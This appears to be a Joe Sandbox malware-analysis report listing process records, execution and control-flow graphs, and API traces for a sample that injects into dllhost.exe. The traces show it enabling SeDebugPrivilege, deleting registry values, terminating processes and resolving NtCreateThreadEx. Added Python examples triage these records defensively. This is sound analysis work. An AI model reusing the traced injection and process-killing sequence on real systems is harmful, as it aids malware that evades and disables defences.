                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:37
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:38
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:39
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:40
                                                                                                                    Start time:16:55:46
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:41
                                                                                                                    Start time:16:55:46
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:42
                                                                                                                    Start time:16:55:46
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:43
                                                                                                                    Start time:16:55:47
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

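The process records above are flat `Field:Value` blocks, and a few of them are worth cross-checking rather than reading one by one: Target ID 42 is a `SysWOW64\dllhost.exe` with a 32-bit image base (`0xf80000`) and the same MD5 as the other WOW64 dllhost instances, yet its `Wow64 process (32bit)` field says `false`, while Target IDs 37, 39 and 43 are the same binary started from a directory whose name is a long run of random letters under `Program Files (x86)`. The Python below is an added example, not part of the Joe Sandbox report: it parses records in this format and applies a few consistency heuristics. `SAMPLE_RECORDS` is copied from the report above (Target IDs 37 and 42); the heuristics themselves (the 20-letter random-name rule, the 4 GiB image-base threshold) are this example's own assumptions, not checks the sandbox performs.

```python
"""Parse Joe Sandbox 'Target ID' process records and cross-check them.

Added example, not part of the Joe Sandbox report. SAMPLE_RECORDS is an
excerpt copied from the report; the consistency rules are this example's
own heuristics (assumptions), not checks the sandbox performs.
"""
import re
from typing import Dict, List

# Excerpt of the process records shown in the report (Target IDs 37 and 42).
SAMPLE_RECORDS = r"""
Target ID:37
Start time:16:55:45
Start date:03/12/2023
Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:42
Start time:16:55:46
Start date:03/12/2023
Path:C:\Windows\SysWOW64\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}
Imagebase:0xf80000
File size:19'256 bytes
MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
"""

# Assumption: a path component of 20 or more letters in mixed case, with no
# digits, spaces or punctuation, is treated as a generated (random) name.
RANDOM_NAME = re.compile(r"^[A-Za-z]{20,}$")


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the report text into one {field: value} dict per blank-line-separated block."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        # Split on the first colon only: values such as "16:55:45" and
        # "C:\Windows\..." contain colons themselves.
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def looks_random(component: str) -> bool:
    """True for a directory or file name that matches the RANDOM_NAME heuristic."""
    stem = component.rsplit(".", 1)[0]
    return bool(RANDOM_NAME.match(stem)) and stem.lower() != stem and stem.upper() != stem


def check_record(rec: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one process record."""
    findings: List[str] = []
    path = rec.get("Path", "")
    lower = path.lower()
    wow64 = rec.get("Wow64 process (32bit)", "").lower() == "true"
    imagebase = int(rec.get("Imagebase", "0x0"), 16)

    # 1. The Wow64 flag should agree with where the image lives.
    in_32bit_dir = "\\syswow64\\" in lower or "\\program files (x86)\\" in lower
    if in_32bit_dir and not wow64:
        findings.append("Wow64 flag is false but the image is in a 32-bit directory: " + path)

    # 2. Assumption: a 64-bit image with ASLR normally loads above 4 GiB
    #    (0x7ff6... for svchost/dllhost in this report); a low base on a
    #    process flagged as not Wow64 is inconsistent.
    if not wow64 and imagebase < 0x1_0000_0000:
        findings.append(f"Wow64 flag is false but image base {imagebase:#x} is below 4 GiB")

    # 3. Generated-looking directory or file names anywhere in the path.
    for component in path.split("\\"):
        if looks_random(component):
            findings.append("random-looking path component: " + component)

    # 4. Record the privilege state so the analyst sees it next to the other findings.
    if rec.get("Has elevated privileges") == "true":
        findings.append("ran with elevated privileges")
    return findings


def triage(text: str) -> Dict[str, List[str]]:
    """Map each Target ID to its findings."""
    return {rec.get("Target ID", "?"): check_record(rec) for rec in parse_records(text)}


if __name__ == "__main__":
    for target, notes in triage(SAMPLE_RECORDS).items():
        print(f"Target ID {target}:")
        for note in notes:
            print("  -", note)
```

On the two sample records, Target ID 42 gets both Wow64 inconsistency findings plus the elevated-privilege note, and Target ID 37 gets two random-name findings (the directory and the executable). Thresholds are deliberately conservative; tune `RANDOM_NAME` and the image-base bound to the environment the report came from.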

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:47.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:74.4%
                                                                                                                      Total number of Nodes:43
                                                                                                                      Total number of Limit Nodes:2
                                                                                                                      execution_graph (node id, address, API calls; "->" lists successor nodes)
                                                                                                                      167  140000231  ExitProcess
                                                                                                                      116  140001000  -> 119
                                                                                                                      119  140001014  GetCurrentProcessId OpenProcess -> 120, 121
                                                                                                                      118  140001009  ExitProcess
                                                                                                                      120  140001045  OpenProcessToken -> 124, 125
                                                                                                                      121  1400010bd  RegOpenKeyExW -> 122, 123
                                                                                                                      124  1400010b4  CloseHandle -> 121
                                                                                                                      125  14000105b  LookupPrivilegeValueW -> 124, 128
                                                                                                                      122  1400010e7  RegDeleteValueW -> 123
                                                                                                                      123  1400010f8  SysAllocString SysAllocString CoInitializeEx -> 126, 127
                                                                                                                      126  140001241  SysFreeString SysFreeString GetProcessHeap HeapAlloc -> 145
                                                                                                                      127  14000112a  CoInitializeSecurity -> 130, 131
                                                                                                                      128  140001072  AdjustTokenPrivileges -> 124, 132
                                                                                                                      145  140001368  GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses -> 146, 147
                                                                                                                      130  140001173  CoCreateInstance -> 134, 135
                                                                                                                      131  140001168  -> 130, 134
                                                                                                                      132  1400010ae  GetLastError -> 124
                                                                                                                      134  14000123b  CoUninitialize -> 126
                                                                                                                      135  1400011a3  VariantInit -> 138
                                                                                                                      133  140001280  -> 136, 141
                                                                                                                      136  1400012d4  GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapAlloc -> 137
                                                                                                                      141  1400012a0  OpenProcess -> 133, 142
                                                                                                                      138  1400011f9
                                                                                                                      137  140001368  13 API calls -> 140
                                                                                                                      140  140001315  -> 139, 143
                                                                                                                      139  140001342  GetProcessHeap HeapFree -> 118
                                                                                                                      143  140001330  -> 153
                                                                                                                      142  1400012b6  TerminateProcess CloseHandle -> 133
                                                                                                                      153  14000155c  -> 154, 155
                                                                                                                      146  1400013f5  -> 147, 148, 150, 151
                                                                                                                      147  1400014c8  GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapFree -> 133
                                                                                                                      148  14000140a  OpenProcess -> 146, 149
                                                                                                                      150  1400014b3  CloseHandle -> 146
                                                                                                                      151  140001459  ReadProcessMemory -> 152
                                                                                                                      149  140001427  K32EnumProcessModules -> 146, 150
                                                                                                                      152  14000147b  -> 146, 150, 151
                                                                                                                      154  14000157b  OpenProcess -> 155, 156
                                                                                                                      155  1400015d0  -> 140
                                                                                                                      156  140001593  -> 161
                                                                                                                      161  1400015e4  -> 164
                                                                                                                      164  140001648  GetModuleHandleA -> 165, 166
                                                                                                                      165  140001663  GetProcAddress -> 166
                                                                                                                      166  1400015f9
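Read end to end, the execution graph above is the behaviour of the code injected into dllhost.exe: it opens its own token and enables a privilege (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges; the strings section names SeDebugPrivilege), cleans registry values (RegOpenKeyExW, RegDeleteValueW), initialises COM (CoInitializeEx, CoInitializeSecurity, CoCreateInstance), enumerates processes and their modules (K32EnumProcesses, OpenProcess, K32EnumProcessModules, ReadProcessMemory), terminates selected ones (TerminateProcess) and resolves further imports at run time (GetModuleHandleA, GetProcAddress). The report prints that graph as one whitespace-separated run of `<id> <address> <APIs...>` node entries and `<a>-><b>` edges. The Python below is an added example, not part of the Joe Sandbox report: it parses that dump into a graph and walks it from the entry node at 140001000 to the first node that calls TerminateProcess, listing the APIs on the way. `EXECUTION_GRAPH` is the graph text copied from the report; the tokenising rules (a decimal id followed by an 8+ hex-digit address, or address range as in the control_flow_graph dumps, starts a node; everything else up to the next node or edge is that node's label) are this example's own reading of the dump, not a documented format.

```python
"""Parse a Joe Sandbox execution_graph / control_flow_graph dump and walk it.

Added example, not part of the Joe Sandbox report. EXECUTION_GRAPH is the
graph text from the report; the tokenising rules are this example's own
assumptions about the dump format.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Copied from the report's execution_graph line (line breaks added; the parser splits on whitespace).
EXECUTION_GRAPH = """
execution_graph 167 140000231 ExitProcess 116 140001000 119 140001014 GetCurrentProcessId OpenProcess 116->119
118 140001009 ExitProcess 120 140001045 OpenProcessToken 119->120 121 1400010bd RegOpenKeyExW 119->121
124 1400010b4 CloseHandle 120->124 125 14000105b LookupPrivilegeValueW 120->125 122 1400010e7 RegDeleteValueW 121->122
123 1400010f8 SysAllocString SysAllocString CoInitializeEx 121->123 122->123
126 140001241 SysFreeString SysFreeString GetProcessHeap HeapAlloc 123->126 127 14000112a CoInitializeSecurity 123->127
124->121 125->124 128 140001072 AdjustTokenPrivileges 125->128
145 140001368 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 126->145
130 140001173 CoCreateInstance 127->130 131 140001168 127->131 128->124 132 1400010ae GetLastError 128->132
134 14000123b CoUninitialize 130->134 135 1400011a3 VariantInit 130->135 131->130 131->134 132->124 133 140001280
136 1400012d4 GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapAlloc 133->136 141 1400012a0 OpenProcess 133->141
134->126 138 1400011f9 135->138 137 140001368 13 API calls 136->137 140 140001315 137->140
139 140001342 GetProcessHeap HeapFree 139->118 140->139 143 140001330 140->143 141->133
142 1400012b6 TerminateProcess CloseHandle 141->142 142->133 153 14000155c 143->153 146 1400013f5 145->146
147 1400014c8 GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapFree 145->147 146->147 148 14000140a OpenProcess 146->148
150 1400014b3 CloseHandle 146->150 151 140001459 ReadProcessMemory 146->151 147->133 148->146
149 140001427 K32EnumProcessModules 148->149 149->146 149->150 150->146 152 14000147b 151->152 152->146 152->150 152->151
154 14000157b OpenProcess 153->154 155 1400015d0 153->155 154->155 156 140001593 154->156 155->140 161 1400015e4 156->161
164 140001648 GetModuleHandleA 161->164 165 140001663 GetProcAddress 164->165 166 1400015f9 164->166 165->166
"""

# Assumed format: a node is a decimal id followed by an 8+ hex-digit address
# (or "start-end" range in control_flow_graph dumps); "a->b" is an edge.
ADDR = re.compile(r"^[0-9a-f]{8,16}(?:-[0-9a-f]{8,16})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
# API names are CamelCase identifiers; this rejects "13", "API", "calls", "*", "call".
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")


@dataclass
class Node:
    id: int
    addr: str
    label: List[str] = field(default_factory=list)

    @property
    def apis(self) -> List[str]:
        return [t for t in self.label if API_NAME.match(t)]


def parse_graph(text: str) -> Tuple[Dict[int, Node], List[Tuple[int, int]]]:
    """Tokenise the dump into nodes keyed by id and a list of (from, to) edges."""
    tokens = text.split()
    nodes: Dict[int, Node] = {}
    edges: List[Tuple[int, int]] = []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = Node(int(tok), tokens[i + 1])
            nodes[current.id] = current
            i += 2
            continue
        if current is not None:  # anything else belongs to the current node's label
            current.label.append(tok)
        i += 1
    return nodes, edges


def nodes_calling(nodes: Dict[int, Node], api: str) -> Set[int]:
    """Ids of nodes whose label contains exactly this API name."""
    return {n.id for n in nodes.values() if api in n.apis}


def shortest_path(edges: List[Tuple[int, int]], start: int, goals: Set[int]) -> List[int]:
    """Breadth-first search from start to the nearest goal node; [] if unreachable."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    parent: Dict[int, object] = {start: None}
    queue = deque([start])
    while queue:
        n = queue.popleft()
        if n in goals:
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for m in succ[n]:
            if m not in parent:
                parent[m] = n
                queue.append(m)
    return []


def api_trace(nodes: Dict[int, Node], path: List[int]) -> List[str]:
    """Flatten the API calls along a path, in execution order."""
    return [api for nid in path for api in nodes[nid].apis]


def entry_to_api(text: str, entry_addr: str, api: str) -> List[str]:
    """APIs executed on the shortest path from the node at entry_addr to the first call of api."""
    nodes, edges = parse_graph(text)
    start = next(n.id for n in nodes.values() if n.addr == entry_addr)
    return api_trace(nodes, shortest_path(edges, start, nodes_calling(nodes, api)))


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    print("OpenProcess called in nodes:", sorted(nodes_calling(nodes, "OpenProcess")))
    print(" -> ".join(entry_to_api(EXECUTION_GRAPH, "140001000", "TerminateProcess")))
```

The parse recovers the 43 nodes the report header declares, and the shortest route from 140001000 to TerminateProcess runs through the privilege-token block, the registry block, COM initialisation and the K32EnumProcesses loop before OpenProcess/TerminateProcess, which is the order an analyst would expect from the control-flow graph that follows. The same `parse_graph` handles the `control_flow_graph` dumps, whose addresses are `start-end` ranges.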

                                                                                                                      Callgraph

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph (block id, address range, API calls; "->" lists successor blocks)
                                                                                                                      0   140001014-140001043  GetCurrentProcessId OpenProcess -> 1, 2
                                                                                                                      1   140001045-140001059  OpenProcessToken -> 5, 6
                                                                                                                      2   1400010bd-1400010e5  RegOpenKeyExW -> 3, 4
                                                                                                                      5   1400010b4-1400010b7  CloseHandle -> 2
                                                                                                                      6   14000105b-140001070  LookupPrivilegeValueW -> 5, 9
                                                                                                                      3   1400010e7-1400010f2  RegDeleteValueW -> 4
                                                                                                                      4   1400010f8-140001124  SysAllocString * 2 CoInitializeEx -> 7, 8
                                                                                                                      7   140001241-140001282  SysFreeString * 2 GetProcessHeap HeapAlloc call 140001368 -> 17, 18
                                                                                                                      8   14000112a-140001166  CoInitializeSecurity -> 11, 12
                                                                                                                      9   140001072-1400010ac  AdjustTokenPrivileges -> 5, 13
                                                                                                                      17  1400012d4-140001317  GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapAlloc call 140001368 -> 26, 27
                                                                                                                      18  140001284-140001289  -> 17, 19
                                                                                                                      11  140001173-14000119d  CoCreateInstance -> 15, 16
                                                                                                                      12  140001168-14000116d  -> 11, 15
                                                                                                                      13  1400010ae            GetLastError -> 5
                                                                                                                      15  14000123b            CoUninitialize -> 7
                                                                                                                      16  1400011a3-1400011fb  VariantInit -> 24, 25
                                                                                                                      24  140001231-140001235  -> 15
                                                                                                                      25  1400011fd-140001215  -> 24, 35
                                                                                                                      26  140001342-140001365  GetProcessHeap HeapFree
                                                                                                                      27  140001319-14000131e  -> 26, 30
                                                                                                                      19  14000128b-14000128e  -> 23
                                                                                                                      23  140001290-140001299  -> 28, 29
                                                                                                                      28  1400012ca-1400012d2  -> 17, 23
                                                                                                                      29  14000129b-14000129e  -> 28, 31
                                                                                                                      35  140001217-14000122b  -> 24
                                                                                                                      30  140001320-140001323  -> 33
                                                                                                                      31  1400012a0-1400012b4  OpenProcess -> 28, 34
                                                                                                                      33  140001325-14000132e  -> 36, 37
                                                                                                                      34  1400012b6-1400012c4  TerminateProcess CloseHandle -> 28
                                                                                                                      36  140001338-140001340  -> 26, 33
                                                                                                                      37  140001330-140001333  call 14000155c -> 36
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Heap$AllocFreeOpenString$CloseDeleteHandleInitializeTokenValue$AdjustBoundaryCreateCurrentDescriptorErrorInitInstanceLastLookupPrivilegePrivilegesSecurityTerminateUninitializeVariant
                                                                                                                      • String ID: $sxrstager$$sxrsvc64$SOFTWARE$SeDebugPrivilege
                                                                                                                      • API String ID: 1045860391-566595606
                                                                                                                      • Opcode ID: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                                      • Instruction ID: 783fc730cd4673971968b08ac741f1a1a7a0f0db785b3f54083c1a857c08c9a6
                                                                                                                      • Opcode Fuzzy Hash: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                                      • Instruction Fuzzy Hash: 60A117B2700B4586EB16CF66F8543E923A5FB8DB89F448125EF0E47AA5DF38D549C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFree$BoundaryCloseDeleteDescriptorHandleMemoryModulesOpenProcessesRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4093845160-0
                                                                                                                      • Opcode ID: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                                      • Instruction ID: 0c4118f11d38248736db898342297cfd33e1e7ee26b5e3befa791c7e9a42177d
                                                                                                                      • Opcode Fuzzy Hash: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                                      • Instruction Fuzzy Hash: 58514AB2611B818AEB66DF63B8587DA22A1F78DBC4F444025EF4A5B764DF38C545C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                      control_flow_graph 57 140000231-140001011 ExitProcess
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                                      • Instruction ID: 71e4820d4104f39f37cf17a5aebe01a9dbe568c608f41c0cf1242f6b27dbe954
                                                                                                                      • Opcode Fuzzy Hash: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                                      • Instruction Fuzzy Hash: 84E0426350E3C10FC7038B74586419C3FB09796A50B8EC59BC385C3383C61C5409C312
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                      control_flow_graph 58 140001000-140001011 call 140001014 ExitProcess
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0000000140001014: GetCurrentProcessId.KERNEL32 ref: 0000000140001027
                                                                                                                        • Part of subcall function 0000000140001014: OpenProcess.KERNEL32 ref: 0000000140001037
                                                                                                                        • Part of subcall function 0000000140001014: OpenProcessToken.ADVAPI32 ref: 0000000140001051
                                                                                                                        • Part of subcall function 0000000140001014: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140001068
                                                                                                                        • Part of subcall function 0000000140001014: AdjustTokenPrivileges.ADVAPI32 ref: 00000001400010A4
                                                                                                                        • Part of subcall function 0000000140001014: GetLastError.KERNEL32 ref: 00000001400010AE
                                                                                                                        • Part of subcall function 0000000140001014: CloseHandle.KERNEL32 ref: 00000001400010B7
                                                                                                                        • Part of subcall function 0000000140001014: RegOpenKeyExW.ADVAPI32 ref: 00000001400010DD
                                                                                                                        • Part of subcall function 0000000140001014: RegDeleteValueW.ADVAPI32 ref: 00000001400010F2
                                                                                                                        • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 00000001400010FF
                                                                                                                        • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 000000014000110F
                                                                                                                        • Part of subcall function 0000000140001014: CoInitializeEx.OLE32 ref: 000000014000111C
                                                                                                                        • Part of subcall function 0000000140001014: CoInitializeSecurity.OLE32 ref: 0000000140001156
                                                                                                                        • Part of subcall function 0000000140001014: CoCreateInstance.OLE32 ref: 0000000140001195
                                                                                                                        • Part of subcall function 0000000140001014: VariantInit.OLEAUT32 ref: 00000001400011A7
                                                                                                                      • ExitProcess.KERNEL32 ref: 000000014000100B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Open$AllocInitializeStringTokenValue$AdjustCloseCreateCurrentDeleteErrorExitHandleInitInstanceLastLookupPrivilegePrivilegesSecurityVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 767316500-0
                                                                                                                      • Opcode ID: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                                      • Instruction ID: 146724fef438b737ed00828a951e49ec2c44f6708d9892ddea2fdd56566e6da4
                                                                                                                      • Opcode Fuzzy Hash: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                                      • Instruction Fuzzy Hash: 65A011B0A00280A2EA0AFBB2388A3C800200B88380F000808A30A832B3CE3C00C88220
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                      control_flow_graph 61 140001648-140001661 GetModuleHandleA 62 140001663-14000166a GetProcAddress 61->62 63 140001670-140001674 61->63 62->63
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1875169417.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                                      • API String ID: 1646373207-690569937
                                                                                                                      • Opcode ID: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                                      • Instruction ID: 1f1ac530e8d7bc586301703381b49fd6cf30065bcfbc8e8d092ce1a2171d6dbf
                                                                                                                      • Opcode Fuzzy Hash: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                                      • Instruction Fuzzy Hash: 5CD0E9F4612A41D1EA0BEF57FC593D512616B9C7C5F854461A70A43271DE3C859AC710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
